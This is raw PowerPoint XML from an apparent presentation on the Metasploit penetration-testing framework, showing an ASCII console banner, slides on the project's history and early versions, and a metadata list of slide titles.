              <a:t>History of Metasploit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158" y="1122303"/>
            <a:ext cx="8892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                                                  _</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" b="1" dirty="0" smtClean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\    /\         __                         _   __  /_/ __</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" b="1" dirty="0" smtClean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CA" sz="20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|\  / | _____   \ \           ___   _____ | | /  \ _   \ \</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="20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| \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="20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|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00868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|/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA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=[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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metasploit v4.7.0-1 [core:4.7 api:1.0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+ -- --=[ 1141 exploits - 720 auxiliary - 194 post</a:t>
            </a:r>
          </a:p>
          <a:p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+ -- --=[ 309 payloads - 30 encoders - 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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nops</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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History of Metasploit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r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>In 2003, H. D. Moore created the Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Goal of providing a resource database for security vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>October 06, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>2003 – Metasploit 1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Perl programming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Curses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>interface </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>11 exploits</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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9" y="6146626"/>
            <a:ext cx="61912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6099001"/>
            <a:ext cx="28670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4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38213"/>
            <a:ext cx="52578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5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000" b="1" cap="all" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="696464"/>
                </a:solidFill>
              </a:rPr>
              <a:t>History of Metasploit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8651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022951A-6135-42D4-BAC8-C44781B398E8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81128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>April 07, 2004 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>– Metasploit 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Collaborative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>effort between H. D. Moore, Matt Miller, and Spoon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Perl programming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>18 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>exploits and 27 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>reliable than anything </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>available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91" y="2691953"/>
            <a:ext cx="2564059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4" y="4757911"/>
            <a:ext cx="6192688" cy="168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0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533400"/>
            <a:ext cx="69151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7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4510</TotalTime>
  <Words>1973</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>414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Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Median</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>METASPLOIT OVERVIEW</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>History of Metasploit</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>History of Metasploit</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>History of Metasploit</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>History of Metasploit</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>History of Metasploit</vt:lpstr>
      <vt:lpstr>History of Metasploit</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Affect of Metasploit on IT Security</vt:lpstr>
      <vt:lpstr>Affect of Metasploit on IT Security</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Basic Theory of Exploiting a System with Metasploit</vt:lpstr>
      <vt:lpstr>Basic Theory of Exploiting a System with Metasploit</vt:lpstr>
      <vt:lpstr>Basic Theory of Exploiting a System with Metasploit</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Metasploit Module Design Goals</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Metasploit Module General Structure</vt:lpstr>
      <vt:lpstr>Metasploit Module General Structure</vt:lpstr>
      <vt:lpstr>Metasploit Module General Structure</vt:lpstr>
      <vt:lpstr>Metasploit Module General Structure</vt:lpstr>
      <vt:lpstr>Metasploit Module General Structure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Angles choice</dc:title>
  <dc:creator>Justin Waelz</dc:creator>
  <cp:lastModifiedBy>Garrett Kaufman</cp:lastModifiedBy>
  <cp:revision>1163</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-03-23T02:06:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-29T16:37:27Z</dcterms:modified>
</cp:coreProperties>
</file>